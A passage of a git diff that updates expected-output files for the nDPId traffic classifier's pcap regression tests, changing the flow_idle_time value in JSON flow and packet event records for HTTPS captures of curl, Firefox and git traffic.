-00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"} -00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} -00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} -01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113120474,"flow_last_seen":1581113120474,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113120474,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113120474,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113120474,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7FgtjjAbvMd3aVAAAAALAC\/\/97wQAAAgQFtAEDAwUBAQgKHmJFtwAAAAAEAgAA"} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113120512,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113120512,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG72OOPktF9zHd2lqAS\/oj9JgAAAgQFrAQCCAolaAqTHmJFtwEDAwc="} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581113120513,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581113120513,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7FgtjjAbvMd3aWj5LRfoAQECwaIgAAAQEICh5iRd0laAqT"} +00841{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581113120474,"flow_last_seen":1581113120522,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581113120522,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}} +00897{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581113120474,"flow_last_seen":1581113120563,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581113120563,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,http\/1.1"}} +01099{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581113120474,"flow_last_seen":1581113120564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581113120564,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"2a26b1a62e40d25d4de3babc9d532f30","ja3s":"ae53107a2e47ea20c72ac44821a728bf","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":109,"flow_first_seen":1581113120474,"flow_last_seen":1581113121570,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":66816,"flow_avg_l4_payload_len":612,"midstream":0,"thread_ts_msec":1581113121570,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":55523,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00558{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":109,"source":"443-curl.pcap","alias":"nDPId-test","packets-captured":109,"packets-processed":109,"total-skipped-flows":0,"total-l4-data-len":66816,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581113121570} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 109/109 diff --git a/test/results/443-firefox.pcap.out b/test/results/443-firefox.pcap.out index 2bf59f249..8ab707821 100644 --- a/test/results/443-firefox.pcap.out +++ b/test/results/443-firefox.pcap.out @@ -1,13 +1,13 @@ 00462{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-firefox.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00548{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581109488041} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109488041,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109488041,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"} -00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"} -00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} -00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581109488041,"flow_last_seen":1581109488041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581109488041,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581109488041,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581109488041,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGAULAqAENsj7Fgs9oAbstYO2oAAAAALAC\/\/8dyQAAAgQFtAEDAwUBAQgKHivVZQAAAAAEAgAA"} +00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581109488079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581109488079,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADQGDUayPsWCwKgBDQG7z2h4KhDzLWDtqaAS\/ojkXQAAAgQFrAQCCAolMJ2OHivVZQEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1581109488079,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1581109488079,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGAU7AqAENsj7Fgs9oAbstYO2peCoQ9IAQECwBWgAAAQEICh4r1YolMJ2O"} +00901{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1581109488041,"flow_last_seen":1581109488081,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1581109488081,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00963{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +01165{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":7,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1581109488041,"flow_last_seen":1581109488123,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":3397,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1581109488123,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"www.ntop.org","ja3":"b20b44b18b853ef29ab773e921b03422","ja3s":"3653a20186a5b490426131a611e01992","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256","issuerDN":"C=US, O=Let's Encrypt, CN=Let's Encrypt Authority X3","subjectDN":"CN=www.ntop.org","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1","fingerprint":"DB:A7:E4:3E:6D:BB:21:AB:68:47:35:E8:0B:8F:15:DF:DB:C7:C9:6F"}} +00689{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":667,"flow_first_seen":1581109488041,"flow_last_seen":1581109496480,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":414073,"flow_avg_l4_payload_len":620,"midstream":0,"thread_ts_msec":1581109496480,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"178.62.197.130","src_port":53096,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"}} 00562{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":667,"source":"443-firefox.pcap","alias":"nDPId-test","packets-captured":667,"packets-processed":667,"total-skipped-flows":0,"total-l4-data-len":414073,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":2,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":11,"global_ts_msec":1581109496480} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 667/667 diff --git a/test/results/443-git.pcap.out b/test/results/443-git.pcap.out index eae19ce6d..01cba0337 100644 --- a/test/results/443-git.pcap.out +++ b/test/results/443-git.pcap.out @@ -1,13 +1,13 @@ 00458{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"443-git.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00544{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1581113657633} -00574{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1581113657633,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1581113657633,"l3_proto":"ip4","src_ip":"192.168.1.13","dst_ip":"140.82.114.4","src_port":55744,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1581113657633,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1581113657633,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGeqzAqAENjFJyBNnAAbv0\/p5\/AAAAALAC\/\/+NzAAAAgQFtAEDAwUBAQgKHmpbwAAAAAAEAgAA"} -00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"443-git.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1581113657744,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1581113657744,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADIGiLCMUnIEwKgBDQG72cCAzdDM9P6egKASb0C\/0wAAAgQFnAQCCAoOCxAaHmpbwAEDAwo="} 